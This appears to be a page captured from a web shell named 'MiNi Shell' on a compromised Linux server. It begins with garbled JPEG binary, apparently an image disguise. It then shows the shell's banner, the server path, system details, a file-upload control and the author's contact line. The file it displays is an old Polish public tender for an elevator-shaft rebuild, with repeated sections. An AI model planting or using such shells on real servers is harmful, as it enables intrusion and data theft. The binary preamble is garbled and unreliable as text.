JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090724/119683-N-2009.html

<p class="kh_header"><b>Giżycko: Przebudowa szybu windowego,
  montaż windy osobowej</b><br>
<b>Numer ogłoszenia: 119683 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Giżycku , ul. Warszawska 31, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 087 4282574, faks 087 4282574.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www/dps-gizycko.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://biuletyn.abip.pl/dps-gizycko/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa szybu windowego,
  montaż windy osobowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dom Pomocy Społecznej w Giżycku ogłasza przetarg nieograniczony na zadanie pn:
Przebudowa szybu windowego,
montaż windy osobowej
polegające na przebudowie szybu windowego, w celu dostosowania go do warunków technicznych montażu dostarczanej windy, montaż windy jej uruchomienie i przekazanie Zamawiającemu do użytkowania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.35.10.00-2, 45.21.52.10-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca winien jest wnieść wadium w wysokości 5.000 zł (pięć tysięcy złotych) w terminie  do dnia 24 sierpnia 2009r., do godz. 10 00,  
w jednej z następujących form ( art. 45 ust. 2 pkt 6 Ustawy Prawo zamówień publicznych ) tj. :
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158 z późn. zm. )

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego : 57934300050013015620000010
4.	W treści przelewu należy wpisać : 
Wadium w postępowaniu o udzielenia zamówienia - Przebudowa szybu windowego, montaż windy osobowej
5.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. 
6.	Wadium w formie gotówki nie będzie przyjmowane. 
7.	Wadium wnoszone w formach niepieniężnych należy zdeponować w  formie oryginału w kasie Zamawiającego  do dnia  24 sierpnia 2009r. do godz. - 10 00
8.	Potwierdzoną przez Wykonawcę za zgodność z oryginałem kopię dokumentu wniesienia wadium należy dołączyć do oferty przetargowej.
9.	Nie wniesienie wadium lub wniesienie wadium po terminie określonym powyżej  spowoduje wykluczenie wykonawcy z postępowania.
10.	Wykonawca winien dołączyć do oferty nr rachunku, na który nastąpić by miał ewentualny zwrot wadium wniesionego w formie pieniężnej. 

11.	Zamawiający zwróci niezwłocznie wadium Wykonawcy, jeżeli :
1)	upłynął termin związania ofertą,
2)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej  umowy,
3)	zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia,

11. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy :
1)	który wycofał ofertę  przed upływem terminu składania ofert,
2)	który został wykluczony z postępowania,
3)	którego oferta została odrzucona

Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana :
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkami ubiegania się Wykonawcy o zamówienie są:
1.	spełnienie wymogów określonych w art. 22 ust. 1 oraz w art. 24 ust 1 ustawy - Prawo zamówień publicznych, tj. 
1)	posiadanie uprawnień do wykonywania działalności lub czynności, będących przedmiotem niniejszego zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

2)	posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, poprzez wykazanie w ofercie przetargowej:
a)	 wykonanie w ciągu 5 lat przed dniem wszczęcia postępowania co najmniej 3 zamówień - każdego odpowiadającego swoim rodzajem i wartością brutto robotom budowlanym stanowiącym przedmiot zamówienia (roboty budowlane polegające na budowie szybu windowego i montażu windy);
b)	zapewnienie uczestnictwa w wykonaniu zamówienia kierownika budowy posiadającego odpowiednie dla zakresu zamówienia uprawnienia budowlane oraz będącego czynnym członkiem właściwej izby samorządu zawodowego;
3)	pozostawania w sytuacji ekonomiczno finansowej zapewniającej wykonanie zamówienia, w tym: posiadanie polisy OC przedsiębiorstwa. 
4)	zobowiązanie do udzielenia gwarancji na wykonane roboty oraz zastosowane materiały na okres nie krótszy niż 3 lata od daty ostatecznego, bezusterkowego odbioru końcowego wykonanych  robót budowlanych;
5)	wskazanie w ofercie wszystkich podwykonawców mających brać udział w wykonaniu zamówienia. 

IV. DOKUMENTY NA POTWIERDZENIE SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU

Informacja o dokumentach jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia wymaganych warunków. 
L.p.	Warunek do spełnienia przez
Wykonawcę	Nazwa wymaganego dokumentu
1.	Złożenie formularza ofertowego.	DRUK Nr 1 załącznika Nr 1.
2.	Spełnienie wymogów określonych w art. 22 ust. 1 oraz w art. 24 ust 1 ustawy - Prawo zamówień publicznych	Oświadczenie  wykonawcy - DRUK Nr 2 załącznika Nr 1.
3.	Posiadanie uprawnień do wykonywania działalności lub czynności, będących przedmiotem niniejszego zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.	Aktualny dokument potwierdzający, że Wykonawca jest uprawniony do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi (np. wypis z rejestru - Krajowy Rejestr Sądowy, zaświadczenie o wpisie do ewidencji działalności gospodarczej), jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej.
4.	Pozostawanie w sytuacji ekonomiczno finansowej zapewniającej wykonanie zamówienia, w tym. brak zaległości wobec US i ZUS oraz posiadanie polisy OC przedsiębiorstwa .
	Aktualne zaświadczenie Urzędu Skarbowego i Zakładu Usług Społecznych o braku zaległości. Polisa OC przedsiębiorstwa.
5.	Zobowiązanie do udzielenia gwarancji na wykonane roboty oraz zastosowane materiały na okres nie krótszy niż 3 lata od daty ostatecznego, bezusterkowego odbioru  końcowego wykonanych robót budowlanych;


	1.	Odpowiednie wypełnienie i podpisanie wzoru umowy, bądź złożenie odrębnego oświadczenia o udzieleniu gwarancji. 
6.	Zapewnienie uczestnictwa w wykonaniu zamówienia kierownika budowy posiadającego odpowiednie dla zakresu zamówienia uprawnienia budowlane oraz będącego czynnym członkiem właściwej izby samorządu zawodowego;
	2.	Wykonawca winien przedstawić dokumenty stwierdzające, że osoby, które będą pełnić obowiązki kierownika budowy posiadają wszelkie (budowlane i sanitarne) wymagane przepisami Prawa Budowlanego uprawnienia, niezbędne do wykonania przedmiotu zamówienia. Wykonawca dodatkowo zobowiązany jest przedstawić zaświadczenie z właściwej Izby Inżynierów Budownictwa potwierdzającą przynależność do Izby.
7.	Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia oraz maszynami (wraz z operatorami) niezbędnymi do wykonania określonych tam robót.	3.	1. Wykaz wykonanych, co najmniej 3 robót budowlanych, w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, odpowiadających swoim rodzajem, wartością robotom budowlanym stanowiącym przedmiot zamówienia - montaż windy (wartość każdej z wykazanych robót  budowlanych musi odpowiadać co najmniej wartości brutto złożonej oferty przetargowej), z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. DRUK Nr 3 załącznika nr 1.
4.	2. Wykonawca winien przedstawić wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności DRUK Nr 4 załącznika nr 1.
5.	3.Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi przy wykonywaniu zamówienia dysponować będzie wykonawca. DRUK Nr 5 załącznika nr 1.
8.	Wskazanie w ofercie wszystkich podwykonawców mających brać udział w wykonaniu zamówienia. 
	Informacja na temat podwykonawców (art. 36 ust. 4 PZP). DRUK NR 6  załącznika nr 1. 
6.	
9.	W przypadku gdy Wykonawca prowadzi działalność gospodarczą w formie spółki cywilnej lub gdy podmioty  wspólnie ubiegają się
 o udzielenie zamówienia	Pełnomocnictwo do reprezentowania wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art. 23 ustawy PZP).
10.	Sporządzenie i dołączenie do oferty kosztorysu szczegółowego.
	Wykonawca winien dołączyć do oferty kosztorys szczegółowy sporządzony na podstawie przedmiarów i dokumentacji projektowej.  
 
  11.	Niewypełniony, podpisany projekt umowy.	DRUK Nr 7 załącznika Nr 1.

 2. Wymagane dokumenty, o których mowa w punktach od 1 do 11 niniejszej tabeli Wykonawca przedstawia w formie oryginału lub kserokopii, poświadczonej za zgodność z oryginałem przez osobę upoważnioną  do reprezentowania firmy.

3. Aktualny dokument - rozumie się jako wystawiony lub uaktualniony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

4. Wykonawcy, którzy nie złożą wymaganych oświadczeń, zaświadczeń, dokumentów (wymienionych w tabeli j.w.) lub nie spełnią innych wymagań określonych w niniejszej Specyfikacji podlegają wykluczeniu i ich oferta zostanie odrzucona. 

5. Złożone w ofercie dokumenty stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji winny być opatrzenie napisem TAJNE.    

Zamawiający oceni spełnienie ww. warunków udziału w postępowaniu na podstawie analizy dokumentów i informacji przedłożonych przez Wykonawców. 
Niespełnienie choćby jednego z powyższych warunków udziału w postępowaniu będzie skutkować wykluczeniem Wykonawcy z postępowania.
Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o dokumentach jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia wymaganych warunków. 
L.p.	Warunek do spełnienia przez
Wykonawcę	Nazwa wymaganego dokumentu
1.	Złożenie formularza ofertowego.	DRUK Nr 1 załącznika Nr 1.
2.	Spełnienie wymogów określonych w art. 22 ust. 1 oraz w art. 24 ust 1 ustawy - Prawo zamówień publicznych	Oświadczenie  wykonawcy - DRUK Nr 2 załącznika Nr 1.
3.	Posiadanie uprawnień do wykonywania działalności lub czynności, będących przedmiotem niniejszego zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.	Aktualny dokument potwierdzający, że Wykonawca jest uprawniony do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi (np. wypis z rejestru - Krajowy Rejestr Sądowy, zaświadczenie o wpisie do ewidencji działalności gospodarczej), jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej.
4.	Pozostawanie w sytuacji ekonomiczno finansowej zapewniającej wykonanie zamówienia, w tym. brak zaległości wobec US i ZUS oraz posiadanie polisy OC przedsiębiorstwa .
	Aktualne zaświadczenie Urzędu Skarbowego i Zakładu Usług Społecznych o braku zaległości. Polisa OC przedsiębiorstwa.
5.	Zobowiązanie do udzielenia gwarancji na wykonane roboty oraz zastosowane materiały na okres nie krótszy niż 3 lata od daty ostatecznego, bezusterkowego odbioru  końcowego wykonanych robót budowlanych;


	1.	Odpowiednie wypełnienie i podpisanie wzoru umowy, bądź złożenie odrębnego oświadczenia o udzieleniu gwarancji. 
6.	Zapewnienie uczestnictwa w wykonaniu zamówienia kierownika budowy posiadającego odpowiednie dla zakresu zamówienia uprawnienia budowlane oraz będącego czynnym członkiem właściwej izby samorządu zawodowego;
	2.	Wykonawca winien przedstawić dokumenty stwierdzające, że osoby, które będą pełnić obowiązki kierownika budowy posiadają wszelkie (budowlane i sanitarne) wymagane przepisami Prawa Budowlanego uprawnienia, niezbędne do wykonania przedmiotu zamówienia. Wykonawca dodatkowo zobowiązany jest przedstawić zaświadczenie z właściwej Izby Inżynierów Budownictwa potwierdzającą przynależność do Izby.
7.	Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia oraz maszynami (wraz z operatorami) niezbędnymi do wykonania określonych tam robót.	3.	1. Wykaz wykonanych, co najmniej 3 robót budowlanych, w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, odpowiadających swoim rodzajem, wartością robotom budowlanym stanowiącym przedmiot zamówienia - montaż windy (wartość każdej z wykazanych robót  budowlanych musi odpowiadać co najmniej wartości brutto złożonej oferty przetargowej), z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. DRUK Nr 3 załącznika nr 1.
4.	2. Wykonawca winien przedstawić wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności DRUK Nr 4 załącznika nr 1.
5.	3.Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi przy wykonywaniu zamówienia dysponować będzie wykonawca. DRUK Nr 5 załącznika nr 1.
8.	Wskazanie w ofercie wszystkich podwykonawców mających brać udział w wykonaniu zamówienia. 
	Informacja na temat podwykonawców (art. 36 ust. 4 PZP). DRUK NR 6  załącznika nr 1. 
6.	
9.	W przypadku gdy Wykonawca prowadzi działalność gospodarczą w formie spółki cywilnej lub gdy podmioty  wspólnie ubiegają się
 o udzielenie zamówienia	Pełnomocnictwo do reprezentowania wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art. 23 ustawy PZP).
10.	Sporządzenie i dołączenie do oferty kosztorysu szczegółowego.
	Wykonawca winien dołączyć do oferty kosztorys szczegółowy sporządzony na podstawie przedmiarów i dokumentacji projektowej.  
 
  11.	Niewypełniony, podpisany projekt umowy.	DRUK Nr 7 załącznika Nr 1.

 2. Wymagane dokumenty, o których mowa w punktach od 1 do 11 niniejszej tabeli Wykonawca przedstawia w formie oryginału lub kserokopii, poświadczonej za zgodność z oryginałem przez osobę upoważnioną  do reprezentowania firmy.

3. Aktualny dokument - rozumie się jako wystawiony lub uaktualniony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

4. Wykonawcy, którzy nie złożą wymaganych oświadczeń, zaświadczeń, dokumentów (wymienionych w tabeli j.w.) lub nie spełnią innych wymagań określonych w niniejszej Specyfikacji podlegają wykluczeniu i ich oferta zostanie odrzucona. 

5. Złożone w ofercie dokumenty stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji winny być opatrzenie napisem TAJNE.    

Zamawiający oceni spełnienie ww. warunków udziału w postępowaniu na podstawie analizy dokumentów i informacji przedłożonych przez Wykonawców. 
Niespełnienie choćby jednego z powyższych warunków udziału w postępowaniu będzie skutkować wykluczeniem Wykonawcy z postępowania.
Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://biuletyn.abip.pl/dps-gizycko/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Giżycku ul. Warszawska 31, 11-500 Giżycko.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2009 godzina 10:00, miejsce: Dom Pomocy Społecznej w Giżycku ul. Warszawska 31, 11-500 Giżycko, pok nr 1 Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com